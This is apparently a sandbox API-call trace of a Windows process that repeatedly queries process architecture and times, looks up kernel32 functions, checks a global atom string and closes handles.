	[0141.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.161] CloseHandle (hObject=0x2dc) returned 1
	[0141.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.161] CloseHandle (hObject=0x2dc) returned 1
	[0141.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.161] CloseHandle (hObject=0x2dc) returned 1
	[0141.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.162] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.162] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.163] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.163] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.163] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.163] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.163] CloseHandle (hObject=0x2dc) returned 1
	[0141.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.164] CloseHandle (hObject=0x2dc) returned 1
	[0141.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.164] CloseHandle (hObject=0x2dc) returned 1
	[0141.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.164] CloseHandle (hObject=0x2dc) returned 1
	[0141.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.164] CloseHandle (hObject=0x2dc) returned 1
	[0141.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.164] CloseHandle (hObject=0x2dc) returned 1
	[0141.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.199] CloseHandle (hObject=0x2dc) returned 1
	[0141.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.199] CloseHandle (hObject=0x2dc) returned 1
	[0141.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.199] CloseHandle (hObject=0x2dc) returned 1
	[0141.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.199] CloseHandle (hObject=0x2dc) returned 1
	[0141.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.200] CloseHandle (hObject=0x2dc) returned 1
	[0141.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.200] CloseHandle (hObject=0x2dc) returned 1
	[0141.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.200] CloseHandle (hObject=0x2dc) returned 1
	[0141.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.200] CloseHandle (hObject=0x2dc) returned 1
	[0141.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.201] CloseHandle (hObject=0x2dc) returned 1
	[0141.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.201] CloseHandle (hObject=0x2dc) returned 1
	[0141.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.201] CloseHandle (hObject=0x2dc) returned 1
	[0141.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.201] CloseHandle (hObject=0x2dc) returned 1
	[0141.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.202] CloseHandle (hObject=0x2dc) returned 1
	[0141.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.202] CloseHandle (hObject=0x2dc) returned 1
	[0141.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.202] CloseHandle (hObject=0x2dc) returned 1
	[0141.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.202] CloseHandle (hObject=0x2dc) returned 1
	[0141.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.203] CloseHandle (hObject=0x2dc) returned 1
	[0141.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.203] CloseHandle (hObject=0x2dc) returned 1
	[0141.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.203] CloseHandle (hObject=0x2dc) returned 1
	[0141.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.204] CloseHandle (hObject=0x2dc) returned 1
	[0141.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.204] CloseHandle (hObject=0x2dc) returned 1
	[0141.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.204] CloseHandle (hObject=0x2dc) returned 1
	[0141.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.204] CloseHandle (hObject=0x2dc) returned 1
	[0141.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.204] CloseHandle (hObject=0x2dc) returned 1
	[0141.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.205] CloseHandle (hObject=0x2dc) returned 1
	[0141.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.205] CloseHandle (hObject=0x2dc) returned 1
	[0141.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.205] CloseHandle (hObject=0x2dc) returned 1
	[0141.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.206] CloseHandle (hObject=0x2dc) returned 1
	[0141.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.206] CloseHandle (hObject=0x2dc) returned 1
	[0141.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.206] CloseHandle (hObject=0x2dc) returned 1
	[0141.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.207] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.207] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.207] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.208] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.208] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.208] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.208] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.208] CloseHandle (hObject=0x2dc) returned 1
	[0141.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.208] CloseHandle (hObject=0x2dc) returned 1
	[0141.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.209] CloseHandle (hObject=0x2dc) returned 1
	[0141.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.209] CloseHandle (hObject=0x2dc) returned 1
	[0141.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.209] CloseHandle (hObject=0x2dc) returned 1
	[0141.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.209] CloseHandle (hObject=0x2dc) returned 1
	[0141.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.242] CloseHandle (hObject=0x2dc) returned 1
	[0141.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.242] CloseHandle (hObject=0x2dc) returned 1
	[0141.243] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.243] CloseHandle (hObject=0x2dc) returned 1
	[0141.243] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.243] CloseHandle (hObject=0x2dc) returned 1
	[0141.243] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.243] CloseHandle (hObject=0x2dc) returned 1
	[0141.243] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.243] CloseHandle (hObject=0x2dc) returned 1
	[0141.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.244] CloseHandle (hObject=0x2dc) returned 1
	[0141.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.244] CloseHandle (hObject=0x2dc) returned 1
	[0141.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.244] CloseHandle (hObject=0x2dc) returned 1
	[0141.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.245] CloseHandle (hObject=0x2dc) returned 1
	[0141.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.245] CloseHandle (hObject=0x2dc) returned 1
	[0141.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.245] CloseHandle (hObject=0x2dc) returned 1
	[0141.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.245] CloseHandle (hObject=0x2dc) returned 1
	[0141.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.246] CloseHandle (hObject=0x2dc) returned 1
	[0141.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.246] CloseHandle (hObject=0x2dc) returned 1
	[0141.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.246] CloseHandle (hObject=0x2dc) returned 1
	[0141.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.246] CloseHandle (hObject=0x2dc) returned 1
	[0141.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.247] CloseHandle (hObject=0x2dc) returned 1
	[0141.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.247] CloseHandle (hObject=0x2dc) returned 1
	[0141.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.247] CloseHandle (hObject=0x2dc) returned 1
	[0141.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.247] CloseHandle (hObject=0x2dc) returned 1
	[0141.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.248] CloseHandle (hObject=0x2dc) returned 1
	[0141.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.248] CloseHandle (hObject=0x2dc) returned 1
	[0141.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.248] CloseHandle (hObject=0x2dc) returned 1
	[0141.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.248] CloseHandle (hObject=0x2dc) returned 1
	[0141.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.249] CloseHandle (hObject=0x2dc) returned 1
	[0141.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.249] CloseHandle (hObject=0x2dc) returned 1
	[0141.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.249] CloseHandle (hObject=0x2dc) returned 1
	[0141.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.250] CloseHandle (hObject=0x2dc) returned 1
	[0141.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.250] CloseHandle (hObject=0x2dc) returned 1
	[0141.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.250] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.250] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.251] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.251] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.251] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.251] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.251] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.251] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.252] CloseHandle (hObject=0x2dc) returned 1
	[0141.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.252] CloseHandle (hObject=0x2dc) returned 1
	[0141.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.252] CloseHandle (hObject=0x2dc) returned 1
	[0141.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.252] CloseHandle (hObject=0x2dc) returned 1
	[0141.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.253] CloseHandle (hObject=0x2dc) returned 1
	[0141.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.253] CloseHandle (hObject=0x2dc) returned 1
	[0141.287] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.287] CloseHandle (hObject=0x2dc) returned 1
	[0141.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.288] CloseHandle (hObject=0x2dc) returned 1
	[0141.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.288] CloseHandle (hObject=0x2dc) returned 1
	[0141.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.288] CloseHandle (hObject=0x2dc) returned 1
	[0141.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.288] CloseHandle (hObject=0x2dc) returned 1
	[0141.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.289] CloseHandle (hObject=0x2dc) returned 1
	[0141.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.289] CloseHandle (hObject=0x2dc) returned 1
	[0141.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.289] CloseHandle (hObject=0x2dc) returned 1
	[0141.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.289] CloseHandle (hObject=0x2dc) returned 1
	[0141.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.290] CloseHandle (hObject=0x2dc) returned 1
	[0141.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.290] CloseHandle (hObject=0x2dc) returned 1
	[0141.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.290] CloseHandle (hObject=0x2dc) returned 1
	[0141.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.291] CloseHandle (hObject=0x2dc) returned 1
	[0141.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.291] CloseHandle (hObject=0x2dc) returned 1
	[0141.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.291] CloseHandle (hObject=0x2dc) returned 1
	[0141.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.292] CloseHandle (hObject=0x2dc) returned 1
	[0141.292] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.292] CloseHandle (hObject=0x2dc) returned 1
	[0141.292] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.292] CloseHandle (hObject=0x2dc) returned 1
	[0141.292] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.292] CloseHandle (hObject=0x2dc) returned 1
	[0141.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.293] CloseHandle (hObject=0x2dc) returned 1
	[0141.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.293] CloseHandle (hObject=0x2dc) returned 1
	[0141.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.294] CloseHandle (hObject=0x2dc) returned 1
	[0141.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.294] CloseHandle (hObject=0x2dc) returned 1
	[0141.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.294] CloseHandle (hObject=0x2dc) returned 1
	[0141.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.294] CloseHandle (hObject=0x2dc) returned 1
	[0141.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.295] CloseHandle (hObject=0x2dc) returned 1
	[0141.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.295] CloseHandle (hObject=0x2dc) returned 1
	[0141.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.295] CloseHandle (hObject=0x2dc) returned 1
	[0141.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.296] CloseHandle (hObject=0x2dc) returned 1
	[0141.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.296] CloseHandle (hObject=0x2dc) returned 1
	[0141.296] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.296] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.297] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.297] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.297] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.297] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.298] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.298] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.298] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.298] CloseHandle (hObject=0x2dc) returned 1
	[0141.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.298] CloseHandle (hObject=0x2dc) returned 1
	[0141.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.299] CloseHandle (hObject=0x2dc) returned 1
	[0141.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.299] CloseHandle (hObject=0x2dc) returned 1
	[0141.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.299] CloseHandle (hObject=0x2dc) returned 1
	[0141.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.299] CloseHandle (hObject=0x2dc) returned 1
	[0141.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.333] CloseHandle (hObject=0x2dc) returned 1
	[0141.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.333] CloseHandle (hObject=0x2dc) returned 1
	[0141.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.334] CloseHandle (hObject=0x2dc) returned 1
	[0141.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.334] CloseHandle (hObject=0x2dc) returned 1
	[0141.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.334] CloseHandle (hObject=0x2dc) returned 1
	[0141.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.334] CloseHandle (hObject=0x2dc) returned 1
	[0141.335] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.335] CloseHandle (hObject=0x2dc) returned 1
	[0141.335] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.335] CloseHandle (hObject=0x2dc) returned 1
	[0141.335] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.335] CloseHandle (hObject=0x2dc) returned 1
	[0141.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.336] CloseHandle (hObject=0x2dc) returned 1
	[0141.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.336] CloseHandle (hObject=0x2dc) returned 1
	[0141.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.336] CloseHandle (hObject=0x2dc) returned 1
	[0141.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.336] CloseHandle (hObject=0x2dc) returned 1
	[0141.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.337] CloseHandle (hObject=0x2dc) returned 1
	[0141.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.337] CloseHandle (hObject=0x2dc) returned 1
	[0141.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.337] CloseHandle (hObject=0x2dc) returned 1
	[0141.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.337] CloseHandle (hObject=0x2dc) returned 1
	[0141.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.338] CloseHandle (hObject=0x2dc) returned 1
	[0141.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.338] CloseHandle (hObject=0x2dc) returned 1
	[0141.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.338] CloseHandle (hObject=0x2dc) returned 1
	[0141.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.338] CloseHandle (hObject=0x2dc) returned 1
	[0141.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.339] CloseHandle (hObject=0x2dc) returned 1
